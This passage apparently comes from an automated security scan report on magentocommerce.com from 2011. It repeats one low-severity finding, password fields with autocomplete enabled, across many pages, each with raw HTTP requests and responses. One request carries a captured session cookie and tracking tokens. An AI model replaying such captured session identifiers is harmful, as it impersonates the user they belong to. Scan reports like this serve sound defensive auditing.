Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Ffr%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:03 GMT
Content-Length: 71918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.42. http://www.magentocommerce.com/he  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /he

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /he HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176550; expires=Sat, 11-Aug-2012 15:15:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhe%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.43. http://www.magentocommerce.com/hu  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /hu

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /hu HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176571; expires=Sat, 11-Aug-2012 15:16:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fhu%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:12 GMT
Content-Length: 84278

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.44. http://www.magentocommerce.com/imagine  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /imagine

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /imagine HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176634; expires=Sat, 11-Aug-2012 15:17:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fimagine%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:17:14 GMT
Content-Length: 36162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.45. http://www.magentocommerce.com/it  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /it

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /it HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:15:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176549; expires=Sat, 11-Aug-2012 15:15:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Fit%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:15:49 GMT
Content-Length: 66320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.46. http://www.magentocommerce.com/jobs  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jobs HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175796; expires=Sat, 11-Aug-2012 15:03:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:16 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.47. http://www.magentocommerce.com/jobs/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jobs/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170938; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.8.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:43:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171038; expires=Sat, 11-Aug-2012 13:43:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:43:58 GMT
Content-Length: 43043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.48. http://www.magentocommerce.com/jobs/p/2/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /jobs/p/2/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /jobs/p/2/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176479; expires=Sat, 11-Aug-2012 15:14:39 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjobs%2Fp%2F2%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:39 GMT
Content-Length: 41691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.49. http://www.magentocommerce.com/knowledge-base  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /knowledge-base

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /knowledge-base HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176264; expires=Sat, 11-Aug-2012 15:11:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:05 GMT
Content-Length: 54452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.50. http://www.magentocommerce.com/license/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /license/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176448; expires=Sat, 11-Aug-2012 15:14:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Flicense%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:08 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.51. http://www.magentocommerce.com/license/enterprise-edition  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /license/enterprise-edition

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /license/enterprise-edition HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176482; expires=Sat, 11-Aug-2012 15:14:42 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A28%3A%22%2Flicense%2Fenterprise-edition%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:42 GMT
Content-Length: 47999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.52. http://www.magentocommerce.com/lodger-footwear/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lodger-footwear/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lodger-footwear/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176633; expires=Sat, 11-Aug-2012 15:17:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Flodger-footwear%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Content-Length: 32496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.53. http://www.magentocommerce.com/lt  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /lt

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lt HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176564; expires=Sat, 11-Aug-2012 15:16:04 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A4%3A%22%2Flt%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:16:05 GMT
Content-Length: 80802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.54. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...
5.55. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

